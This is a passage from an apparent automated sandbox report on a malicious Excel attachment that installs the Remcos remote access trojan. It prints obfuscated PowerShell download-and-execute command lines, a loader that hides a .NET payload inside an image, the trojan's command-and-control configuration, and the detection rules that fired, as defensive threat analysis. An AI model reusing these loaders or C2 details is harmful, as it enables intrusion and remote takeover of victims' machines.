1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxwaWN0dXJldXBkYXRlZHdpdGhuZXdxdWFsaXQudmJTIg=='+[chAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3612, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\pictureupdatedwithnewqualit.vbS" , ProcessId: 3808, ProcessName: wscript.exe
                Sigma detected: Dynamic CSharp Compile Artefact
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3612, TargetFilename: C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.cmdline
                Sigma detected: Modification of IE Registry Settings
                Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3236, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'JDdqODhlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlRkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFUWlpKeUdmQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVpOdlJUdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbVBFUEJKUkVVSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZGeSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUlNZmJ3bERwVik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiSUVHQUlJdERNIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlTUWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN2o4OGU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xODUuMjM1LjEzNy4yMjMvMjAwL3BpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdHkudElGIiwiJEVudjpBUFBEQVRBXHBpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdC52YlMiLDAsMCk7c3RBcnQtU0xFRVAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxwaWN0dXJldXBkYXRlZHdpdGhuZXdxdWFsaXQudmJTIg=='+[chAr]34+'))')))", CommandLine: poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'JDdqODhlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlRkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFUWlpKeUdmQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVpOdlJUdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbVBFUEJKUkVVSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZGeSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUlNZmJ3bERwVik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiSUVHQUlJdERNIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlTUWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICA
                Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3612, TargetFilename: C:\Users\user\AppData\Local\Temp\eyswzaui.bvq.ps1

                Data Obfuscation

                barindex
                Sigma detected: Powershell download and load assembly
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RECSRN/002/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RECSRN/002/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0
                Sigma detected: Dot net compiler compiles file from suspicious location
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'JDdqODhlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlRkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFUWlpKeUdmQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVpOdlJUdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbVBFUEJKUkVVSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZGeSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUlNZmJ3bERwVik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiSUVHQUlJdERNIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNQQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlTUWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN2o4OGU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xODUuMjM1LjEzNy4yMjMvMjAwL3BpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdHkudElGIiwiJEVudjpBUFBEQVRBXHBpY3R1cmV1cGRhdGVkd2l0aG5ld3F1YWxpdC52YlMiLDAsMCk7c3RBcnQtU0xFRVAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxwaWN0dXJldXBkYXRlZHdpdGhuZXdxdWFsaXQudmJTIg=='+[chAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3612, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.cmdline", ProcessId: 3720, ProcessName: csc.exe

                Stealing of Sensitive Information

                barindex
                Sigma detected: Remcos
                Source: Registry Key setAuthor: Joe Security: Data: Details: 40 37 8B 92 01 93 C4 CC 7F 40 26 DB C8 72 F1 63 F5 5A 9C F3 BE 40 83 FD FC 6D 64 8B 58 AC CF 00 2F DA 1F F9 8C 1A A5 00 2D D9 34 0D FB 2F E7 2F A7 46 E8 A5 28 88 4F E7 A7 62 DC C5 C3 F9 BF E2 D7 88 9A 32 F6 06 34 A1 67 CC C0 00 DC 71 45 21 86 DC 26 61 8E C2 0E 5F 73 FF BE FE 42 35 3C ED 98 5E 41 A0 96 66 64 70 C5 85 1B 14 79 33 53 69 05 8B , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 4064, TargetObject: HKEY_CURRENT_USER\Software\Rmc-GT4655\exepath

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-09T17:48:56.908351+020020241971A Network Trojan was detected185.235.137.22380192.168.2.2249164TCP
                2024-09-09T17:48:59.517862+020020241971A Network Trojan was detected185.235.137.22380192.168.2.2249166TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-09T17:48:56.908349+020020244491Attempted User Privilege Gain192.168.2.2249164185.235.137.22380TCP
                2024-09-09T17:48:59.517853+020020244491Attempted User Privilege Gain192.168.2.2249166185.235.137.22380TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-09T17:49:13.605287+020020204231Exploit Kit Activity Detected185.235.137.22380192.168.2.2249169TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-09T17:49:13.605287+020020204251Exploit Kit Activity Detected185.235.137.22380192.168.2.2249169TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-09T17:49:15.269324+020020365941Malware Command and Control Activity Detected192.168.2.2249170192.3.101.2914645TCP
                2024-09-09T17:49:16.723246+020020365941Malware Command and Control Activity Detected192.168.2.2249171192.3.101.2914645TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-09T17:49:12.632846+020020490381A Network Trojan was detected207.241.227.96443192.168.2.2249168TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-09T17:49:16.819096+020028033043Unknown Traffic192.168.2.2249172178.237.33.5080TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: camzeroconnect.duckdns.orgAvira URL Cloud: Label: malware
                Found malware configuration
                Source: 00000011.00000002.624187857.0000000000811000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "camzeroconnect.duckdns.org:14645:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-GT4655", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                Multi AV Scanner detection for submitted file
                Source: RFQ_0230909024SEPT.xla.xlsxReversingLabs: Detection: 13%
                Yara detected Remcos RAT
                Source: Yara matchFile source: 14.2.powershell.exe.12691f90.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.powershell.exe.12691f90.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000011.00000002.624187857.00000000007F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.624187857.0000000000811000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.514320776.0000000012550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3940, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4064, type: MEMORYSTR
                Machine Learning detection for sample
                Source: RFQ_0230909024SEPT.xla.xlsxJoe Sandbox ML: detected
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,17_2_004338C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00404423 FreeLibrary,CryptUnprotectData,21_2_00404423
                Source: powershell.exe, 0000000E.00000002.514320776.0000000012550000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_0d341864-6

                Exploits

                barindex
                Yara detected UAC Bypass using CMSTP
                Source: Yara matchFile source: 14.2.powershell.exe.12691f90.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.powershell.exe.12691f90.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.514320776.0000000012550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3940, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4064, type: MEMORYSTR

                Privilege Escalation

                barindex
                Contains functionality to bypass UAC (CMSTPLUA)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00407538 _wcslen,CoGetObject,17_2_00407538
                Source: unknownHTTPS traffic detected: 207.241.227.96:443 -> 192.168.2.22:49168 version: TLS 1.0
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: unknownHTTPS traffic detected: 95.217.202.210:443 -> 192.168.2.22:49163 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 95.217.202.210:443 -> 192.168.2.22:49165 version: TLS 1.2
                Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb\ source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
